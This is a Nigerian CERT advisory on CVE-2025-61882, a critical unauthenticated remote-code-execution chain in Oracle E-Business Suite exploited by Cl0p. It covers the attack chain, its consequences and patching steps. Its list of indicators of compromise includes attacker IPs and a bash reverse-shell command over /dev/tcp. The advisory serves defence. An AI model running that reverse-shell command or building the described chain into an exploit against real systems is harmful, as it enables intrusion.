ngCERT SECURITY ADVISORY ON CRITICAL VULNERABILITY AFFECTING ORACLE E-BUSINESS SUITE

Advisory ID:   ngCERT-2025-100005

SUMMARY

ngCERT has detected a critical and easily exploitable vulnerability affecting the Oracle E-Business Suite (EBS) in Nigeria. This vulnerability, assigned 

CVE-2025-61882 could be exploited remotely by an unauthenticated attacker with network access via HTTP to achieve remote code execution (RCE), potentially leading to full system takeover. Assigned a CVSS 3.1 with a base score of 9.8 (Critical), the flaw has been actively exploited in the wild by the Cl0p ransomware group; hence, it has been listed in CISA's Known Exploited Vulnerabilities (KEV) Catalogue. There is therefore an urgent need for organisations to update applications and apply patches to safeguard against exploits and possible cyberattacks.

Damage:      Critical (CVSS 3.1 Base Score 9.8)

Probability:  High 

Platform(s):  Oracle e-Business Suite

DESCRIPTION

CVE-2025-61882 is a critical vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within Oracle EBS
versions 12.2.3 through 12.2.14. It arises from a chain of exploitable weaknesses, including inconsistent HTTP request parsing, path traversal, improper neutralisation of CRLF sequences, XML external entity (XXE) reference issues, XML injection, and server-side request forgery (SSRF). An unauthenticated attacker with HTTP network access crafts malicious HTTP requests to exploit these flaws. The attack begins by leveraging inconsistent request parsing and path traversal to access restricted server resources. By injecting crafted XML payloads, the attacker exploits XXE and XML injection vulnerabilities to manipulate server-side processing. CRLF injection escalates the attack by injecting malicious headers, enabling SSRF to trigger unauthorized server requests. This chain culminates in RCE, allowing the attacker to execute arbitrary commands on the server without authentication.

CONSEQUENCES

Successful exploitation of these flaws could result in:

1. Full System Compromise: Unauthenticated attackers can achieve remote code execution (RCE), gaining complete control over the Oracle E-Business Suite (EBS) instance.
2. Data Exfiltration: Sensitive business data, including financial and customer information, can be stolen, leading to severe privacy and intellectual property breaches.
3. Ransomware Deployment: Exploitation by groups like Cl0p enables ransomware attacks, causing data encryption and operational paralysis.
4. Confidentiality and Integrity Loss: Full exposure and modification of sensitive data, undermining system trustworthiness and business operations.
5. Service Disruption: Denial of service can halt critical EBS functions, leading to significant operational downtime.

SOLUTION/MITIGATION

To mitigate these vulnerabilities, ngCERT recommends the following measures:

1. Apply Security Patches: Immediately install patches for Oracle E-Business Suite versions 12.2.3–12.2.14 as specified in Oracle’s patch availability document (Note 3106344.1 on My Oracle Support). Ensure the October 2023 Critical Patch Update (CPU) is applied as a prerequisite.
2. Restrict Network Access: Limit HTTP access to the BI Publisher Integration component to trusted IP ranges using firewall rules or web application firewalls (WAF) to block malicious requests.
3. Monitor and Detect: Actively monitor logs for indicators of compromise (IOCs), such as IP addresses (e.g., 200.107.207.26, 185.181.60.11), commands (e.g., sh -c /bin/bash -i >& /dev/tcp/ / 0>&1), or file hashes (e.g., SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d).
4. Upgrade EBS Versions: Migrate to supported EBS versions under Premier or Extended Support to ensure patch availability and enhanced security.
5. Disable Unnecessary Features: Deactivate non-essential Concurrent Processing features to reduce the attack surface.
6. Interim Isolation: If patching is delayed, isolate the EBS environment from untrusted networks and enhance logging to detect exploitation attempts.

HYPERLINK

• https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
• https://nvd.nist.gov/vuln/detail/CVE-2025-61882
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
• https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
• https://www.hipaajournal.com/cl0p-mass-exploiting-zero-day-vulnerability-oracle-e-business-suite/
• https://www.ncsc.gov.uk/news/active-exploitation-vulnerability-affecting-oracle-ebusiness-suite